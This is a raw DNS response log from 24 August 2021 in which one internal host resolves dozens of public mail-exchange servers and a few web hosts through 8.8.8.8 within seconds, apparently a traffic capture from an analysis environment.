Aug 24, 2021 08:50:15.027899981 CEST	8.8.8.8	192.168.2.5	0x3f0b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:15.030615091 CEST	8.8.8.8	192.168.2.5	0x923d	No error (0)	r-smtp6.korea.com		119.205.212.219	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:15.537031889 CEST	8.8.8.8	192.168.2.5	0x3509	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:15.537031889 CEST	8.8.8.8	192.168.2.5	0x3509	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.58.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:15.722174883 CEST	8.8.8.8	192.168.2.5	0x1194	Server failure (2)	korea.com	none	none	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:15.864989042 CEST	8.8.8.8	192.168.2.5	0xe409	No error (0)	consent.google.co.uk		172.217.168.46	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.300987005 CEST	8.8.8.8	192.168.2.5	0x267c	No error (0)	linden.gute.se			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:16.375066042 CEST	8.8.8.8	192.168.2.5	0x6207	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.375066042 CEST	8.8.8.8	192.168.2.5	0x6207	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.383277893 CEST	8.8.8.8	192.168.2.5	0x984a	No error (0)	mail.h-email.net		54.190.26.211	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.383277893 CEST	8.8.8.8	192.168.2.5	0x984a	No error (0)	mail.h-email.net		34.222.93.91	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.383277893 CEST	8.8.8.8	192.168.2.5	0x984a	No error (0)	mail.h-email.net		34.212.139.205	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.383277893 CEST	8.8.8.8	192.168.2.5	0x984a	No error (0)	mail.h-email.net		34.212.36.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.383277893 CEST	8.8.8.8	192.168.2.5	0x984a	No error (0)	mail.h-email.net		34.220.245.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.383277893 CEST	8.8.8.8	192.168.2.5	0x984a	No error (0)	mail.h-email.net		54.244.49.115	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.383277893 CEST	8.8.8.8	192.168.2.5	0x984a	No error (0)	mail.h-email.net		34.223.6.127	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.383277893 CEST	8.8.8.8	192.168.2.5	0x984a	No error (0)	mail.h-email.net		54.200.93.251	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.383277893 CEST	8.8.8.8	192.168.2.5	0x984a	No error (0)	mail.h-email.net		54.187.110.113	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.383277893 CEST	8.8.8.8	192.168.2.5	0x984a	No error (0)	mail.h-email.net		18.237.235.220	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.452661037 CEST	8.8.8.8	192.168.2.5	0x8f4a	No error (0)	www.google.co.uk		172.217.168.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.003007889 CEST	8.8.8.8	192.168.2.5	0xd22f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.003007889 CEST	8.8.8.8	192.168.2.5	0xd22f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.076554060 CEST	8.8.8.8	192.168.2.5	0x9be3	No error (0)	www.instagram.com	default-geo-p42.instagram.com		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:50:17.076554060 CEST	8.8.8.8	192.168.2.5	0x9be3	No error (0)	default-geo-p42.instagram.com	z-p42-instagram.c10r.instagram.com		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:50:17.076554060 CEST	8.8.8.8	192.168.2.5	0x9be3	No error (0)	z-p42-instagram.c10r.instagram.com		157.240.17.174	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.603843927 CEST	8.8.8.8	192.168.2.5	0xf2e7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.603843927 CEST	8.8.8.8	192.168.2.5	0xf2e7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.644925117 CEST	8.8.8.8	192.168.2.5	0x86be	No error (0)	live.co.uk			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:17.720113039 CEST	8.8.8.8	192.168.2.5	0x90ba	No error (0)	eur.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.720113039 CEST	8.8.8.8	192.168.2.5	0x90ba	No error (0)	eur.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.933028936 CEST	8.8.8.8	192.168.2.5	0x1c23	No error (0)	eur.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.933028936 CEST	8.8.8.8	192.168.2.5	0x1c23	No error (0)	eur.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:18.099034071 CEST	8.8.8.8	192.168.2.5	0xe9ab	No error (0)	verat.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:18.155258894 CEST	8.8.8.8	192.168.2.5	0xeeb8	No error (0)	assp.beotel.net		194.106.162.44	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:18.155287027 CEST	8.8.8.8	192.168.2.5	0x4aa	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:18.155287027 CEST	8.8.8.8	192.168.2.5	0x4aa	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:18.770225048 CEST	8.8.8.8	192.168.2.5	0xc68	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:18.770225048 CEST	8.8.8.8	192.168.2.5	0xc68	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.377523899 CEST	8.8.8.8	192.168.2.5	0x501e	No error (0)	ironfox.it			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:19.423263073 CEST	8.8.8.8	192.168.2.5	0x2b03	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.423263073 CEST	8.8.8.8	192.168.2.5	0x2b03	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.424192905 CEST	8.8.8.8	192.168.2.5	0xb0c6	No error (0)	mail.mailerhost.net		18.237.235.220	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.424192905 CEST	8.8.8.8	192.168.2.5	0xb0c6	No error (0)	mail.mailerhost.net		34.212.139.205	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.424192905 CEST	8.8.8.8	192.168.2.5	0xb0c6	No error (0)	mail.mailerhost.net		54.190.26.211	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.424192905 CEST	8.8.8.8	192.168.2.5	0xb0c6	No error (0)	mail.mailerhost.net		54.200.93.251	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.424192905 CEST	8.8.8.8	192.168.2.5	0xb0c6	No error (0)	mail.mailerhost.net		34.222.93.91	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.424192905 CEST	8.8.8.8	192.168.2.5	0xb0c6	No error (0)	mail.mailerhost.net		34.212.36.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.424192905 CEST	8.8.8.8	192.168.2.5	0xb0c6	No error (0)	mail.mailerhost.net		34.223.6.127	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.424192905 CEST	8.8.8.8	192.168.2.5	0xb0c6	No error (0)	mail.mailerhost.net		54.187.110.113	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.424192905 CEST	8.8.8.8	192.168.2.5	0xb0c6	No error (0)	mail.mailerhost.net		34.220.245.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.424192905 CEST	8.8.8.8	192.168.2.5	0xb0c6	No error (0)	mail.mailerhost.net		54.244.49.115	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:20.153403044 CEST	8.8.8.8	192.168.2.5	0xa170	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:20.153403044 CEST	8.8.8.8	192.168.2.5	0xa170	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:20.856036901 CEST	8.8.8.8	192.168.2.5	0xbc4d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:20.856036901 CEST	8.8.8.8	192.168.2.5	0xbc4d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:21.531152964 CEST	8.8.8.8	192.168.2.5	0xe753	No error (0)	foxmail.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:21.531152964 CEST	8.8.8.8	192.168.2.5	0xe753	No error (0)	foxmail.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:21.531152964 CEST	8.8.8.8	192.168.2.5	0xe753	No error (0)	foxmail.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:21.691324949 CEST	8.8.8.8	192.168.2.5	0xe482	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:21.691324949 CEST	8.8.8.8	192.168.2.5	0xe482	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:21.757174015 CEST	8.8.8.8	192.168.2.5	0xd9e6	No error (0)	telkomsa.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:21.757174015 CEST	8.8.8.8	192.168.2.5	0xd9e6	No error (0)	telkomsa.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:21.926542044 CEST	8.8.8.8	192.168.2.5	0x6bc	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.074708939 CEST	8.8.8.8	192.168.2.5	0x6bc	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.078612089 CEST	8.8.8.8	192.168.2.5	0x5829	No error (0)	mail.telkomsa.net		105.187.200.240	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.087110996 CEST	8.8.8.8	192.168.2.5	0x26f4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.087110996 CEST	8.8.8.8	192.168.2.5	0x26f4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.203983068 CEST	8.8.8.8	192.168.2.5	0xb7b8	No error (0)	auth.api.np.ac.playstation.net	auth.api.np.ac.playstation.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:50:23.316478968 CEST	8.8.8.8	192.168.2.5	0x6df4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.316478968 CEST	8.8.8.8	192.168.2.5	0x6df4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.365545988 CEST	8.8.8.8	192.168.2.5	0xc2c0	No error (0)	live-com.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.365545988 CEST	8.8.8.8	192.168.2.5	0xc2c0	No error (0)	live-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.570904970 CEST	8.8.8.8	192.168.2.5	0xd75f	No error (0)	live-com.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.570904970 CEST	8.8.8.8	192.168.2.5	0xd75f	No error (0)	live-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.770473003 CEST	8.8.8.8	192.168.2.5	0x503d	No error (0)	live-com.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.770473003 CEST	8.8.8.8	192.168.2.5	0x503d	No error (0)	live-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.843375921 CEST	8.8.8.8	192.168.2.5	0xbb6e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.843375921 CEST	8.8.8.8	192.168.2.5	0xbb6e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.985497952 CEST	8.8.8.8	192.168.2.5	0x9e12	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.985497952 CEST	8.8.8.8	192.168.2.5	0x9e12	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.420622110 CEST	8.8.8.8	192.168.2.5	0xbae4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.420622110 CEST	8.8.8.8	192.168.2.5	0xbae4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.494592905 CEST	8.8.8.8	192.168.2.5	0x68a7	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.531133890 CEST	8.8.8.8	192.168.2.5	0xa52b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.531133890 CEST	8.8.8.8	192.168.2.5	0xa52b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.588202953 CEST	8.8.8.8	192.168.2.5	0xb02d	No error (0)	seznam.cz			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:24.588202953 CEST	8.8.8.8	192.168.2.5	0xb02d	No error (0)	seznam.cz			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:24.660121918 CEST	8.8.8.8	192.168.2.5	0x930a	No error (0)	mx1.seznam.cz		77.75.78.42	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.660121918 CEST	8.8.8.8	192.168.2.5	0x930a	No error (0)	mx1.seznam.cz		77.75.76.42	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.936043978 CEST	8.8.8.8	192.168.2.5	0x9dc7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.936043978 CEST	8.8.8.8	192.168.2.5	0x9dc7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.084907055 CEST	8.8.8.8	192.168.2.5	0xbee6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.084907055 CEST	8.8.8.8	192.168.2.5	0xbee6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.165453911 CEST	8.8.8.8	192.168.2.5	0x8c54	No error (0)	77.52.17.84.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 24, 2021 08:50:25.548114061 CEST	8.8.8.8	192.168.2.5	0x1f84	No error (0)	optonline.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:25.610085011 CEST	8.8.8.8	192.168.2.5	0x362b	No error (0)	mx.optimum.net		167.206.4.79	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.610085011 CEST	8.8.8.8	192.168.2.5	0x362b	No error (0)	mx.optimum.net		167.206.4.77	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.610239029 CEST	8.8.8.8	192.168.2.5	0x21dd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.610239029 CEST	8.8.8.8	192.168.2.5	0x21dd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.787254095 CEST	8.8.8.8	192.168.2.5	0xcbe2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.787254095 CEST	8.8.8.8	192.168.2.5	0xcbe2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.366565943 CEST	8.8.8.8	192.168.2.5	0x964d	No error (0)	sotke.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:26.415275097 CEST	8.8.8.8	192.168.2.5	0xa19b	No error (0)	svitonline.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:26.415275097 CEST	8.8.8.8	192.168.2.5	0xa19b	No error (0)	svitonline.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:26.415275097 CEST	8.8.8.8	192.168.2.5	0xa19b	No error (0)	svitonline.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:26.415275097 CEST	8.8.8.8	192.168.2.5	0xa19b	No error (0)	svitonline.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:26.415275097 CEST	8.8.8.8	192.168.2.5	0xa19b	No error (0)	svitonline.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:26.462959051 CEST	8.8.8.8	192.168.2.5	0xd1d5	No error (0)	outlook-com.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.462959051 CEST	8.8.8.8	192.168.2.5	0xd1d5	No error (0)	outlook-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.496258974 CEST	8.8.8.8	192.168.2.5	0x795a	No error (0)	relay05.kiev.sovam.com		188.163.244.254	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.529014111 CEST	8.8.8.8	192.168.2.5	0xaae4	No error (0)	sotke.com		170.39.76.102	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.715910912 CEST	8.8.8.8	192.168.2.5	0xba51	No error (0)	live-com.olc.protection.outlook.com		104.47.9.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.715910912 CEST	8.8.8.8	192.168.2.5	0xba51	No error (0)	live-com.olc.protection.outlook.com		104.47.8.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.716201067 CEST	8.8.8.8	192.168.2.5	0x3b18	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.716201067 CEST	8.8.8.8	192.168.2.5	0x3b18	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.898152113 CEST	8.8.8.8	192.168.2.5	0x3557	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.898152113 CEST	8.8.8.8	192.168.2.5	0x3557	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:27.283968925 CEST	8.8.8.8	192.168.2.5	0x9f95	No error (0)	mail.telkomsa.net		105.187.200.240	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:27.414362907 CEST	8.8.8.8	192.168.2.5	0x4b4a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:27.414362907 CEST	8.8.8.8	192.168.2.5	0x4b4a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:27.927194118 CEST	8.8.8.8	192.168.2.5	0x8026	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:27.927194118 CEST	8.8.8.8	192.168.2.5	0x8026	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.445089102 CEST	8.8.8.8	192.168.2.5	0x8154	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.445089102 CEST	8.8.8.8	192.168.2.5	0x8154	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.446034908 CEST	8.8.8.8	192.168.2.5	0x2055	No error (0)	msn-com.olc.protection.outlook.com		104.47.59.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.446034908 CEST	8.8.8.8	192.168.2.5	0x2055	No error (0)	msn-com.olc.protection.outlook.com		104.47.55.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.644973993 CEST	8.8.8.8	192.168.2.5	0x6bbe	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.644973993 CEST	8.8.8.8	192.168.2.5	0x6bbe	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.954024076 CEST	8.8.8.8	192.168.2.5	0xab20	No error (0)	mx.optimum.net		167.206.4.79	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.954024076 CEST	8.8.8.8	192.168.2.5	0xab20	No error (0)	mx.optimum.net		167.206.4.77	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.974446058 CEST	8.8.8.8	192.168.2.5	0x2bdd	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.081422091 CEST	8.8.8.8	192.168.2.5	0x9108	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.089202881 CEST	8.8.8.8	192.168.2.5	0x20ba	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.089202881 CEST	8.8.8.8	192.168.2.5	0x20ba	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.141433954 CEST	8.8.8.8	192.168.2.5	0x9de5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.141433954 CEST	8.8.8.8	192.168.2.5	0x9de5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.257543087 CEST	8.8.8.8	192.168.2.5	0x3b95	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.257543087 CEST	8.8.8.8	192.168.2.5	0x3b95	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.339508057 CEST	8.8.8.8	192.168.2.5	0xa23b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.339508057 CEST	8.8.8.8	192.168.2.5	0xa23b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.439513922 CEST	8.8.8.8	192.168.2.5	0xfa5c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.439513922 CEST	8.8.8.8	192.168.2.5	0xfa5c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.608716965 CEST	8.8.8.8	192.168.2.5	0x12a8	No error (0)	laposte.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:29.650110960 CEST	8.8.8.8	192.168.2.5	0x9da	No error (0)	smtpz4.laposte.net		160.92.124.66	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.897804022 CEST	8.8.8.8	192.168.2.5	0xf71	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.897804022 CEST	8.8.8.8	192.168.2.5	0xf71	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.925276041 CEST	8.8.8.8	192.168.2.5	0xaf7b	No error (0)	hotmail.co.uk			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:29.969885111 CEST	8.8.8.8	192.168.2.5	0xb5ba	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.969885111 CEST	8.8.8.8	192.168.2.5	0xb5ba	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.151765108 CEST	8.8.8.8	192.168.2.5	0x37e9	No error (0)	outlook-com.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.151765108 CEST	8.8.8.8	192.168.2.5	0x37e9	No error (0)	outlook-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.398192883 CEST	8.8.8.8	192.168.2.5	0x4094	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.398192883 CEST	8.8.8.8	192.168.2.5	0x4094	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.916832924 CEST	8.8.8.8	192.168.2.5	0x553c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.916832924 CEST	8.8.8.8	192.168.2.5	0x553c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.924529076 CEST	8.8.8.8	192.168.2.5	0x839c	No error (0)	live-com.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.924529076 CEST	8.8.8.8	192.168.2.5	0x839c	No error (0)	live-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.121467113 CEST	8.8.8.8	192.168.2.5	0xdf40	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.121467113 CEST	8.8.8.8	192.168.2.5	0xdf40	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.431984901 CEST	8.8.8.8	192.168.2.5	0x2eba	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.431984901 CEST	8.8.8.8	192.168.2.5	0x2eba	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.634017944 CEST	8.8.8.8	192.168.2.5	0xb918	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.634017944 CEST	8.8.8.8	192.168.2.5	0xb918	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.822931051 CEST	8.8.8.8	192.168.2.5	0x2d9d	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.822931051 CEST	8.8.8.8	192.168.2.5	0x2d9d	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.960125923 CEST	8.8.8.8	192.168.2.5	0x3557	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.10.33	A (IP address)	IN (0x0001)
